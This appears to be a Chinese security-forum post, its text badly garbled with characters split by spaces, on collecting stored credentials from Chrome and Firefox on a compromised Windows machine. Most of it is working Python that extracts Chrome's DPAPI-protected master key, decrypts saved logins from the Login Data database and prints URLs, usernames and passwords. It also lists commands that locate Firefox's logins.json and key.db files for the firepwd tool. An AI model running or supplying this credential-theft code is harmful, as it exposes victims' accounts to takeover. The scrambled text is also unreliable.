[338] 2020-09-12_Chrome、Firefox信息搜集

文档创建者:s7ckTeam
浏览次数:10
最后更新:2025-01-16
2020-09-12_Chrome、Firefox信息搜集 C h r o m e F i r e f o x     a F a   2 0 2 0 - 0 9 - 1 2   #   , 4 3 c h r o m e f i r e f o x c h r o m e C o o k i e s c h r o m e C o o k i e s C : U s e r s A d m i n i s t r a t o r A p p D a t a L o c a l G o o g l e C h r o m e U s e r   D a t a D e f a u l t 访 B o o k m a r k s H i s t o r y C o o k i e s 访 c o o k i e 访 s q l i t e 使 s q l i t e s t u d i o c h r o m e 线 线 c h r o m e 8 0 8 0 8 5 8 5 c h r o m e 访 C : P r o g r a m   F i l e s G o o g l e C h r o m e A p p l i c a t i o n h t t p s : / / g i t h u b . c o m / a g e n t z e x / c h r o m e _ v 8 0 _ p a s s w o r d _ g r a b b e r c h r o m e 线 线 线 便 p y t h o n p y t h o n 线 D P A P I M a s t e r K e y
D P A P I D a t a   P r o t e c t i o n   A P I w i n d o w s c h r o m e c o o k i e s l o g i n   d a t a D P A P I 使 m a s t e r   k e y m a s t e r   k e y k e y k e y h a s h c h r o m e l o g i n   d a t a l o g i n   d a t a 使 D P A P I D P A P I 使 m a s t e r   k e y m a s t e r   k e y h a s h m a s t e r k e y c h r o m e l o g i n d a t a l o g i n   s t a t e m a s t e r   k e y l o g i n   s t a t e C : U s e r s A d m i n i s t r a t o r A p p D a t a L o c a l G o o g l e C h r o m e U s e r   D a t a p y t h o n e x e m a s t e r   k e y m a s t e r k e y c h r o m e l o g i n d a t a C : U s e r s A d m i n i s t r a t o r A p p D a t a L o c a l G o o g l e C h r o m e U s e r   D a t a D e f a u l t i m p o r t   w i n 3 2 c r y p t i m p o r t   o s i m p o r t   j s o n i m p o r t   b a s e 6 4 w i t h   o p e n ( o s . e n v i r o n [ ' U S E R P R O F I L E ' ]   +   o s . s e p   +   r ' L o c a l   S t a t e ' , " r " )   a s   f :     l o c a l _ s t a t e   =   f . r e a d ( )     l o c a l _ s t a t e   =   j s o n . l o a d s ( l o c a l _ s t a t e )     m a s t e r _ k e y   =   b a s e 6 4 . b 6 4 d e c o d e ( l o c a l _ s t a t e [ " o s _ c r y p t " ] [ " e n c r y p t e d _ k e y " ] )     m a s t e r _ k e y _ w _ C r y   =   m a s t e r _ k e y [ 5 : ]     #   p r i n t ( m a s t e r _ k e y _ w _ C r y ) m a s t e r _ k e y   =   w i n 3 2 c r y p t . C r y p t U n p r o t e c t D a t a ( m a s t e r _ k e y _ w _ C r y ,   N o n e ,   N o n e ,   N o n e ,   0 ) [ 1 ] p r i n t ( m a s t e r _ k e y ) w i t h   o p e n ( " m a s t e r k e y . t x t " , ' w b ' )   a s   m s f :     m s f . w r i t e ( m a s t e r _ k e y ) i m p o r t   o s i m p o r t   j s o n i m p o r t   b a s e 6 4 i m p o r t   s q l i t e 3 i m p o r t   w i n 3 2 c r y p t f r o m   C r y p t o . C i p h e r   i m p o r t   A E S i m p o r t   s h u t i l d e f   g e t _ m a s t e r _ k e y ( ) :     w i t h   o p e n ( " m a s t e r k e y . t x t " , ' r b ' )   a s   m s f :         b u f   =   m s f . r e a d ( )         p r i n t ( b u f )         r e t u r n   b u f d e f   d e c r y p t _ p a y l o a d ( c i p h e r ,   p a y l o a d ) :     r e t u r n   c i p h e r . d e c r y p t ( p a y l o a d ) d e f   g e n e r a t e _ c i p h e r ( a e s _ k e y ,   i v ) :
f i r e f o x c o o k i e f i r e f o x p l a c e s . s q l i t e d i r % A P P D A T A % m o z i l l a f i r e f o x p r o f i l e s * p l a c e s . s q l i t e   / s   / b p l a c e s . s q l i t e f i r e f o x c o o k i e c o o k i e . s q l i t e p l a c e s . s q l i t e     r e t u r n   A E S . n e w ( a e s _ k e y ,   A E S . M O D E _ G C M ,   i v ) d e f   d e c r y p t _ p a s s w o r d ( b u f f ,   m a s t e r _ k e y ) :     t r y :         i v   =   b u f f [ 3 : 1 5 ]         p a y l o a d   =   b u f f [ 1 5 : ]         c i p h e r   =   g e n e r a t e _ c i p h e r ( m a s t e r _ k e y ,   i v )         d e c r y p t e d _ p a s s   =   d e c r y p t _ p a y l o a d ( c i p h e r ,   p a y l o a d )         d e c r y p t e d _ p a s s   =   d e c r y p t e d _ p a s s [ : - 1 6 ] . d e c o d e ( )   #   r e m o v e   s u f f i x   b y t e s         r e t u r n   d e c r y p t e d _ p a s s     e x c e p t   E x c e p t i o n   a s   e :         #   p r i n t ( " P r o b a b l y   s a v e d   p a s s w o r d   f r o m   C h r o m e   v e r s i o n   o l d e r   t h a n   v 8 0 n " )         #   p r i n t ( s t r ( e ) )         r e t u r n " C h r o m e < 8 0 " i f   _ _ n a m e _ _   = =   ' _ _ m a i n _ _ ' :     m a s t e r _ k e y   =   g e t _ m a s t e r _ k e y ( )     c o n n   =   s q l i t e 3 . c o n n e c t ( " L o g i n D a t a " )     c u r s o r   =   c o n n . c u r s o r ( )     t r y :         c u r s o r . e x e c u t e ( " S E L E C T   a c t i o n _ u r l ,   u s e r n a m e _ v a l u e ,   p a s s w o r d _ v a l u e   F R O M   l o g i n s " )         f o r   r   i n   c u r s o r . f e t c h a l l ( ) :             u r l   =   r [ 0 ]             u s e r n a m e   =   r [ 1 ]             e n c r y p t e d _ p a s s w o r d   =   r [ 2 ]             p r i n t ( e n c r y p t e d _ p a s s w o r d )             d e c r y p t e d _ p a s s w o r d   =   d e c r y p t _ p a s s w o r d ( e n c r y p t e d _ p a s s w o r d ,   m a s t e r _ k e y )             p r i n t ( " U R L : "   +   u r l   +   " n U s e r N a m e : "   +   u s e r n a m e   +   " n P a s s w o r d : "   +   d e c r y p t e d _ p a s s w o r d   +   " n " +   " * " * 5 0 + " n " )     e x c e p t   E x c e p t i o n   a s   e :         p r i n t ( ' e r r o r ' )         p a s s     c u r s o r . c l o s e ( )     c o n n . c l o s e ( )     t r y :         o s . r e m o v e ( " L o g i n v a u l t . d b " )     e x c e p t   E x c e p t i o n   a s   e :         p a s s
f i r e f o x 线 线 f i r e p w d p y t h o n 3   f i r e p w d . p y   - d   . / d i r   % A P P D A T A % m o z i l l a f i r e f o x p r o f i l e s * l o g i n s . j s o n   / s   / b d i r   % A P P D A T A % m o z i l l a f i r e f o x p r o f i l e s * k e y . d b   / s   / b h t t p s : / / g i t h u b . c o m / l c l e v y / f i r e p w d / f i r e f o x f i r e f o x 使 f i r e p w d p L a Z a g n e 使 便 使
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则